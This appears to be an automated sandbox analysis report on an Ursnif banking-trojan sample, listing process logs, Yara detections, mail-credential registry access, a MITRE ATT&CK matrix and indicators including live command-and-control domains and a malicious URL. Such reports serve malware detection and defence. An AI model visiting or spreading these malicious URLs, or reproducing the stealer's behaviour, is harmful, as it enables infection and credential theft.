Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: explorer.exe, 0000001C.00000000.922381772.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.884577351.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_6E4B105E
Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD2E33 cpuid 0_2_00DD2E33
Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B109B GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_6E4B109B
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD2E33 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_00DD2E33
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0457D8BC CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,0_2_0457D8BC
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B1C6F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6E4B1C6F

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
Source: Yara match | File source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality:

Yara detected Ursnif

                      Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts (1) | Windows Management Instrumentation (2) | DLL Side-Loading (1) | DLL Side-Loading (1) | Obfuscated Files or Information (1) | Credential API Hooking (3) | System Time Discovery (1) | Remote Services | Archive Collected Data (11) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (3) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact (1) |
| Default Accounts | Native API (1) | Valid Accounts (1) | Valid Accounts (1) | DLL Side-Loading (1) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Email Collection (11) | Exfiltration Over Bluetooth | Encrypted Channel (2) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | Command and Scripting Interpreter (1) | Logon Script (Windows) | Access Token Manipulation (1) | Rootkit (4) | Security Account Manager | File and Directory Discovery (3) | SMB/Windows Admin Shares | Credential API Hooking (3) | Automated Exfiltration | Non-Application Layer Protocol (4) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | PowerShell (1) | Logon Script (Mac) | Process Injection (913) | Masquerading (1) | NTDS | System Information Discovery (46) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (14) | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Valid Accounts (1) | LSA Secrets | Query Registry (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation (1) | Cached Domain Credentials | Security Software Discovery (11) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion (21) | DCSync | Virtualization/Sandbox Evasion (21) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection (913) | Proc Filesystem | Process Discovery (3) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll32 (1) | /etc/passwd and /etc/shadow | Application Window Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Owner/User Discovery (1) | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |
| Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | Remote System Discovery (1) | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop |
| Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | System Network Configuration Discovery (2) | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery |

                      Behavior Graph

[Behavior graph image not recoverable in text form. Behavior Graph ID: 498359, Sample: data.dll, Start date: 07/10/2021, Architecture: WINDOWS, Score: 100]


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

| Source | Detection | Scanner | Label |
|---|---|---|---|
| data.dll | 7% | Virustotal | |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 3.2.rundll32.exe.5d0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 |
| 0.2.loaddll32.exe.dd0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 |
| 5.2.rundll32.exe.4a70000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 |

                      Domains

| Source | Detection | Scanner | Label |
|---|---|---|---|
| init.icecreambob.com | 3% | Virustotal | |
| art.microsoftsofymicrosoftsoft.at | 10% | Virustotal | |
| 222.222.67.208.in-addr.arpa | 2% | Virustotal | |

URLs

Source | Detection | Scanner | Label
http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm | 100% | Avira URL Cloud | malware
http://ns.adobe.co/xa | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
